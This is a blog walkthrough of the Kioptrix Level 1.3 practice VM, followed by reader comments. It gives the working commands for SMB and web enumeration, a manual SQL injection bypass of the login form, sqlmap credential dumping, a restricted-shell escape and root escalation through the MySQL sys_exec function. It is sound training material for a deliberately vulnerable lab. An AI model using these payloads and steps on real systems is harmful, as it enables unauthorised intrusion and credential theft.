Vulnhub – Kioptrix: Level 1.3 (#4)

Part 4 of 5 of the kioptrix series. The kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to VMs in the PWK course for those who want to get the OSCP certification. Point of the game is to find a way to get root shell on the vulnerable machine. Link to downloading the Vm can be found here. Now lets get started!

NOTE: When extracting the VM. I was only given a vmdk (virtual machine disk) which gave me problems when trying to open it up with VMware. I used this guide called Create Workstation Virtual Machine Using Existing Virtual Disks to help me out.

Description from author:
Again a long delay between VMs, but that cannot be helped. Work, family must come first. Blogs and hobbies are pushed down the list. These things aren’t as easy to make as one may think. Time and some planning must be put into these challenges, to make sure that:

1. It’s possible to get root remotely [ Edit: sorry not what I meant ]

1a. It’s possible to remotely compromise the machine

Stays within the target audience of this site

Must be “realistic” (well kinda…)

Should serve as a refresher for me. Be it PHP or MySQL usage etc. Stuff I haven’t done in a while.

I also had lots of troubles exporting this one. So please take the time to read my comments at the end of this post.

Keeping in the spirit of things, this challenge is a bit different than the others but remains in the realm of the easy. Repeating myself I know, but things must always be made clear: These VMs are for the beginner. It’s a place to start.

I’d would love to code some small custom application for people to exploit. But I’m an administrator not a coder. It would take too much time to learn/code such an application. Not saying I’ll never try doing one, but I wouldn’t hold my breath. If someone wants more difficult challenges, I’m sure the Inter-tubes holds them somewhere. Or you can always enroll in Offsec’s PWB course. *shameless plug

— A few things I must say. I made this image using a new platform. Hoping everything works but I can’t test for everything. Initially the VM had troubles getting an IP on boot-up. For some reason the NIC wouldn’t go up and the machine was left with the loopback interface. I hope that I fixed the problem. Don’t be surprised if it takes a little moment for this one to boot up. It’s trying to get an IP. Be a bit patient. Someone that tested the image for me also reported the VM hung once powered on. Upon restart all was fine. Just one person reported this, so hoping it’s not a major issue. If you plan on running this on vmFusion, you may need to convert the imagine to suit your fusion version.

— Also adding the VHD file for download, for those using Hyper-V. You guys may need to change the network adapter to “Legacy Network Adapter”. I’ve test the file and this one seems to run fine for me… If you’re having problems, or it’s not working for any reason email comms[=]kioptrix.com

Thanks to @shai_saint from www.n00bpentesting.com for the much needed testing with various VM solutions.

Thanks to Patrick from Hackfest.ca for also running the VM and reporting a few issues. And Swappage & @Tallenz for doing the same. All help is appreciated guys

So I hope you enjoy this one.

The Kioptrix Team

Source: http://www.kioptrix.com/blog/?p=604

**Note: Just a virtual hard drive. You’ll need to create a new virtual machine & attach the existing hard drive**

The Attack

Kali Linux machine

 192.168.182.147 

Scanning and Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.154

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

I then ran a SYN stealth scan on the target and found ports 22, 80, 139, and 445 open!

root@kali:~# nmap -sS -n  192.168.182.154

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-03-12 19:38 CDT
Nmap scan report for 192.168.182.154
Host is up (0.00034s latency).
Not shown: 566 closed ports, 430 filtered ports
PORT    STATE SERVICE
22/tcp  open  ssh
80/tcp  open  http
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds
MAC Address: 00:0C:29:68:B2:1F (VMware)

Nmap done: 1 IP address (1 host up) scanned in 157.82 seconds
root@kali:~#  

Since ports 139/tcp and 445/tcp are open lets enumerate SMB and check to see if there is any shares open as well as usernames using enum4linux. Much output came from using enum4linux however I only displayed the useful info below.

root@kali:~# enum4linux 192.168.182.154
 ========================================= 
|    OS information on 192.168.182.154    |
 ========================================= 
[+] Got OS info for 192.168.182.154 from smbclient: Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
[+] Got OS info for 192.168.182.154 from srvinfo:
	KIOPTRIX4      Wk Sv PrQ Unx NT SNT Kioptrix4 server (Samba, Ubuntu)
	platform_id     :	500
	os version      :	4.9
	server type     :	0x809a03

 ================================ 
|    Users on 192.168.182.154    |
 ================================ 
index: 0x1 RID: 0x1f5 acb: 0x00000010 Account: nobody	Name: nobody	Desc: (null)
index: 0x2 RID: 0xbbc acb: 0x00000010 Account: robert	Name: ,,,	Desc: (null)
index: 0x3 RID: 0x3e8 acb: 0x00000010 Account: root	Name: root	Desc: (null)
index: 0x4 RID: 0xbba acb: 0x00000010 Account: john	Name: ,,,	Desc: (null)
index: 0x5 RID: 0xbb8 acb: 0x00000010 Account: loneferret	Name: loneferret,,,	Desc: (null)

user:[nobody] rid:[0x1f5]
user:[robert] rid:[0xbbc]
user:[root] rid:[0x3e8]
user:[john] rid:[0xbba]
user:[loneferret] rid:[0xbb8]
 ============================================ 
|    Share Enumeration on 192.168.182.154    |
 ============================================ 
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Kioptrix4 server (Samba, Ubuntu))

	Server               Comment
	---------            -------
	KIOPTRIX4            Kioptrix4 server (Samba, Ubuntu)

	Workgroup            Master
	---------            -------
	WORKGROUP            KIOPTRIX4

[+] Attempting to map shares on 192.168.182.154
//192.168.182.154/print$	Mapping: DENIED, Listing: N/A
//192.168.182.154/IPC$	[E] Can't understand response:
Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.28a]
NT_STATUS_NETWORK_ACCESS_DENIED listing \*

Found that the victim is running Samba 3.0.28a(no public exploits available) and got 5 usernames from the enumeration! It also attempted to map the shares print$ and IPC$ but it didn’t work. Lets try using dirb to scan the victims website.

root@kali:~# dirb http://192.168.182.154

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sun Mar 12 21:29:00 2017
URL_BASE: http://192.168.182.154/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.182.154/ ----
+ http://192.168.182.154/cgi-bin/ (CODE:403|SIZE:330)                                                                                                                                    
==> DIRECTORY: http://192.168.182.154/images/                                                                                                                                            
+ http://192.168.182.154/index (CODE:200|SIZE:1255)                                                                                                                                      
+ http://192.168.182.154/index.php (CODE:200|SIZE:1255)                                                                                                                                  
==> DIRECTORY: http://192.168.182.154/john/                                                                                                                                              
+ http://192.168.182.154/logout (CODE:302|SIZE:0)                                                                                                                                        
+ http://192.168.182.154/member (CODE:302|SIZE:220)                                                                                                                                      
+ http://192.168.182.154/server-status (CODE:403|SIZE:335)                                                                                                                               
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                                                                                                                                         
---- Entering directory: http://192.168.182.154/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.                        
    (Use mode '-w' if you want to scan it anyway)
                                                                               
-----------------
END_TIME: Sun Mar 12 21:29:03 2017
DOWNLOADED: 4612 - FOUND: 6
root@kali:~# 

Found some useful stuff including a /john/ directory.

So checking the website, it has a login. Lets see if it’s vulnerable to an SQL injection by putting a comma ' in the username and password fields.

Well look what we have here! It is vulnerable to SQLi!!

Exploitation

I will be using 2 ways to get 2 login credentials to the server. The first will be a manual SQL injection and the second will be using sqlmap. Both will yield the same results. Just wanted to let you all know just so you don’t get confused or anything. Lets get started!

Manual SQLi

Lets try to do an injection using one of the usernames from the SMB enumeration. I’m going to start with user john because I also found the john directory when using dirb. I will input john in the username field and 1' or '1'='1 in the password field. Now the SQL query will something like this in the back end:

SELECT * FROM users where username='john' and password='1' or '1'='1' 

It worked!! Got john’s credentials with the password being MyNameIsJohn

Did the same method with robert and got his credentials as well with his password being ADGAdsafdfwt4gadfga==
Note-You can skip to Escaping restricted shell to continue the pentest or go to SQLi using sqlmap to learn another method on how I got the credentials to the server.

SQLi using sqlmap

Well from output given from checking if the site was vulnerable to an SQLi and the checking the code from the login source below. It gives me enough info to perform an SQLi using sqlmap.

Using the command will give me the the databases running on the site.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --dbs

We have 3 databases. Lets check out what the database members has to offer by giving us the tables in the database using the command below.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --dbms=MySQL  --data="myusername=username&mypassword=password" --level=5 --risk=3  --tables -D members

So the table in the database is members. Lets dump the info from the table and see what we get using the command below.

root@kali:~# sqlmap -u "http://192.168.182.154/checklogin.php" --data="myusername=username&mypassword=password"  -D members -T members --dump

BINGO!! We got 2 valid login credentials that I will use to ssh into the server.

Escaping restricted shell

root@kali:~# ssh john@192.168.182.154
john@192.168.182.154's password: 
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ ?
cd  clear  echo  exit  help  ll  lpath  ls
john:~$ 

As I log in, I noticed that I have a limited shell with only a few commands that I am allowed to run. Since I can run the command echo, I can easily “escape” and bypass the limited shell by using the command echo os.system('/bin/bash')

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$ id
uid=1001(john) gid=1001(john) groups=1001(john)
john@Kioptrix4:~$ 

Privilege Escalation

Once out of limited shell, I ran several commands to see if I could find anything interesting.

john@Kioptrix4:~$ cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=8.04
DISTRIB_CODENAME=hardy
DISTRIB_DESCRIPTION="Ubuntu 8.04.3 LTS"
john@Kioptrix4:~$ cat /proc/version
Linux version 2.6.24-24-server (buildd@palmer) (gcc version 4.2.4 (Ubuntu 4.2.4-1ubuntu4)) #1 SMP Tue Jul 7 20:21:17 UTC 2009
john@Kioptrix4:~$ ps -ef | grep root
root         1     0  0 Mar12 ?        00:00:01 /sbin/init
root         2     0  0 Mar12 ?        00:00:00 [kthreadd]
root         3     2  0 Mar12 ?        00:00:00 [migration/0]
root         4     2  0 Mar12 ?        00:00:00 [ksoftirqd/0]
root         5     2  0 Mar12 ?        00:00:00 [watchdog/0]
root         6     2  0 Mar12 ?        00:00:00 [events/0]
root         7     2  0 Mar12 ?        00:00:00 [khelper]
root        41     2  0 Mar12 ?        00:00:00 [kblockd/0]
root        44     2  0 Mar12 ?        00:00:00 [kacpid]
root        45     2  0 Mar12 ?        00:00:00 [kacpi_notify]
root       170     2  0 Mar12 ?        00:00:00 [kseriod]
root       208     2  0 Mar12 ?        00:00:00 [pdflush]
root       209     2  0 Mar12 ?        00:00:00 [pdflush]
root       210     2  0 Mar12 ?        00:00:00 [kswapd0]
root       252     2  0 Mar12 ?        00:00:00 [aio/0]
root      1468     2  0 Mar12 ?        00:00:00 [ata/0]
root      1471     2  0 Mar12 ?        00:00:00 [ata_aux]
root      1480     2  0 Mar12 ?        00:00:00 [scsi_eh_0]
root      1485     2  0 Mar12 ?        00:00:00 [scsi_eh_1]
root      1498     2  0 Mar12 ?        00:00:00 [ksuspend_usbd]
root      1503     2  0 Mar12 ?        00:00:00 [khubd]
root      2359     2  0 Mar12 ?        00:00:00 [scsi_eh_2]
root      2602     2  0 Mar12 ?        00:00:00 [kjournald]
root      2769     1  0 Mar12 ?        00:00:00 /sbin/udevd --daemon
root      3042     2  0 Mar12 ?        00:00:00 [kgameportd]
root      3212     2  0 Mar12 ?        00:00:00 [kpsmoused]
root      4501     1  0 Mar12 tty4     00:00:00 /sbin/getty 38400 tty4
root      4502     1  0 Mar12 tty5     00:00:00 /sbin/getty 38400 tty5
root      4507     1  0 Mar12 tty2     00:00:00 /sbin/getty 38400 tty2
root      4509     1  0 Mar12 tty3     00:00:00 /sbin/getty 38400 tty3
root      4518     1  0 Mar12 tty6     00:00:00 /sbin/getty 38400 tty6
root      4569     1  0 Mar12 ?        00:00:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4590     1  0 Mar12 ?        00:00:00 /usr/sbin/sshd
root      4646     1  0 Mar12 ?        00:00:00 /bin/sh /usr/bin/mysqld_safe
root      4688  4646  0 Mar12 ?        00:00:16 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=root --pid-file=/var/run/mysqld/mysqld.pid
root      4690  4646  0 Mar12 ?        00:00:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4763     1  0 Mar12 ?        00:00:00 /usr/sbin/nmbd -D
root      4765     1  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4779  4765  0 Mar12 ?        00:00:00 /usr/sbin/smbd -D
root      4780     1  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4800  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4812     1  0 Mar12 ?        00:00:00 /usr/sbin/cron
root      4834     1  0 Mar12 ?        00:00:00 /usr/sbin/apache2 -k start
root      4890     1  0 Mar12 tty1     00:00:00 /sbin/getty 38400 tty1
root      4943  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      4944  4780  0 Mar12 ?        00:00:00 /usr/sbin/winbindd
root      5752  4590  0 01:07 ?        00:00:00 sshd: john [priv]
john      5901  5807  0 02:26 pts/0    00:00:00 grep root
john@Kioptrix4:~$ 

I can see that MySQL is running with root privileges. Since I have ssh access to the machine lets see if I find the database credentials by accessing the configuration files.

john@Kioptrix4:~$ ls /var/www/
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:~$ 

Well looks like there is no password needed to access the database. What I will be attempting is since we have root access on MySQL we can execute commands(on the operating system itself) using User Defined Functions. In short, because we can access MySQL server as root, we will escalate our privileges to root using User Defined Functions. In order to perform these commands we need to make sure lib_mysqludf_sys.so is on the server. Using the whereis command I discovered that it was already installed on the server.

john@Kioptrix4:~$ whereis lib_mysqludf_sys.so
lib_mysqludf_sys: /usr/lib/lib_mysqludf_sys.so
john@Kioptrix4:~$ 

Lets access the MySQL server. Looked up these tutorials which helped me out with understanding MySQL UDF more. MySQL Root to System Root with lib_mysqludf_sys for Windows and Linux and Command execution with a MySQL UDF

john@Kioptrix4:~$ mysql -h localhost -u root -p
Enter password: 
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 98586
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> select sys_exec('usermod -a -G admin john');
+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 | 
+--------------------------------------+
1 row in set (0.08 sec)

mysql> exit
Bye
john@Kioptrix4:~$ sudo su
[sudo] password for john: 
root@Kioptrix4:/home/john# whoami
root
root@Kioptrix4:/home/john# id
uid=0(root) gid=0(root) groups=0(root)
root@Kioptrix4:/home/john# hostname
Kioptrix4
root@Kioptrix4:/home/john# 

Using sys_exec I was able to run usermod which added john to the admin group and then ran sudo su to get the root shell.

Conclusion

This was tougher than the previous level but when it got tough, I used the university of google (google) for some additional help. Did several exploitations which in turn got me access to the server and then had to use MySQL to do privilege escalation to get our desired root shell. If you had any questions on anything or enjoyed the read, leave some feedback below! Well that’s it for this level. Now on to the last one!

8 comments

  1. Thanks mate for the clear explanations. I was actually lost in the wild , i took OSCP lab for 30days and was able to crack only 4 systems. I don’t have any experience in pentesting. 🙁 I want to do this , but no guidance, if you can help me with how to go about – any procedure it will be helpful . I can practice VM’s on my own and start taking the OSCP lab again.In kioptrix 4 , after getting the shell you used Mysql to escalate the privileges , how did you think about it . I’ve such questions doing rounds in my head. please let me know if you help in any VM and how to go about cracking it. Please and thanks you so much for the clear tutorial ,it made me understand many things .. 😀

    1. Well how I got started in pentesting is reading up on Penetration Testing: A Hands-On Introduction to Hacking by georgia weidman. That book is a great start and the author has videos about pentesting on cybrary.it . Check out Cybrary’s Advanced Pentration testing.These videos go hand to hand with the book and are extremely helpful. I still haven’t finished the whole book because of school but I highly recommend it. Another book which is on my list is the Hacker’s Playbook 2: Practical Guide to Penetration Testing. Those 2 books and cybrary are more than enough to get started into pentesting. Regarding kioptrix 4 when I got the shell I used a guide called basic linux privilege escalation, which helps on running several commands to see if I can find any useful into to escalate my privileges. Specifically with the Mysql I had remembered awhile back about reading on using user defined functions on Mysql to escalate privileges so when I checked to see what processes were running root and found Mysql in the list of processes running root, I knew what to do from there. Hope that helps in any way. Sorry for the late reply, had finals this week and am currently in the national cyber league(which i recommend you try) so that was taking a good amount of my time. I’m glad I could help you with kioptrix4. If you have any other questions or need help with anything else, just let me know.

  2. Thanks bro, thank you so much for taking the time to respond. Sure, I’ll go through the books & videos and also “national cyber league” once I’m confident in myself. HUh Yes , you helped me “how to think” :D. If anything I need I’ll surely reach out to you for help 🙂

    1. Anytime. Last few week have been hectic for but now that I have time so if you have any questions, just let me know. Ill be happy to help. Yeah I should’ve stated that I knew how to get privilege escalation from mysql because of a prior experience dealing with mysql user defined functions. So yea just let me know if you have any questions with anything else. Will write more write ups since now I have more time on my hands.

      1. Thanks , Waiting for more writeups on other VM’s from you. Till now I’ve completed practicing all the VM’s mentioned here and as you said now going through the pentesting course on cybrary.

        1. Yea its been a LONG while since I’ve done a writeup. Been real busy. I want my writeups to be very thorough and that takes ALOT of time from me. Been learning x86 to learn more about reverse engineering but I think I might do a writeup soon. Havent decided yet. Might look into metasploitable 3 or just another vm similar to PWK course.

Leave a Reply

Your email address will not be published. Required fields are marked *